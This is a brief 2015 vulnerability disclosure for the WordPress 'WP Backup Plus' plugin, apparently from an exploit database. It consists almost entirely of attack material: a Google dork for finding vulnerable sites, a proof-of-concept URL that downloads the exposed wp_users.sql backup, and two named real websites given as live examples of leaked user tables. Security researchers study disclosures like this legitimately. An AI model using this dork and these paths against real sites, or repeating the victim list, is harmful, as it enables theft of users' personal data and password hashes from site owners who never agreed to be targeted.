WordPress Backup Plus plugin suffers from a backup disclosure vulnerability.
056ac016e79f188831a939f61304499fcf1fc2abee30ff96fac53c8345fb53c4
# WordPress 'WP Backup Plus' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: http://wpbackupplus.com/
# Google Dork: inurl:/wp-content/uploads/wp-backup-plus/
# PoC :
http://SITE.COM/wp-content/uploads/wp-backup-plus/temp/wp_users.sql OR "Other Table Name".
# Examples:
http://easy-family-boating-recipes.com/wp-content/uploads/wp-backup-plus/temp/cnb24p_users.sql
http://bestsolarpanelsmelbourne.com.au/wp-content/uploads/wp-backup-plus/temp/wp_users.sql